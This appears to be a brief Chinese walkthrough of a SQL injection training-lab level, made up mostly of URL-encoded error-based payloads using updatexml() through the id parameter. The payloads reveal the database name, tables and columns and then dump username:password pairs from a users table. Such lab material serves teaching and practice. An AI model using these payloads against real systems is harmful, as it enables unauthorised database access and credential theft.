和第五关类似,只不过闭合符号是双引号
1,查数据库
1"and%20(updatexml(1,concat(0x7e,(select%20database()),0x7e),1))%20--+
2.查表
内容有多行,所以使用limit依次查询
1"and%20(updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)%20,0x7e),1))%20--+
limit 3,1 查出来users表
?id=1"and%20(updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1)%20,0x7e),1))%20--+
查字段名:
?id=1"and%20(updatexml(1,concat(0x7e,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20)%20,0x7e),1))%20--+
返回超过1 行,使用limit进行处理
limit 4,1 返回username字段
limit 5,1 返回password字段
查询字段内容,返回结果超过一行,使用limit函数
/?id=1"and%20(updatexml(1,concat(0x7e,(select%20username%20from%20users)%20,0x7e),1))%20--+
依次进行查询
id=1"and%20(updatexml(1,concat(0x7e,(select%20concat(username,":",password)%20from%20users%20limit%200,1)%20,0x7e),1))%20--+
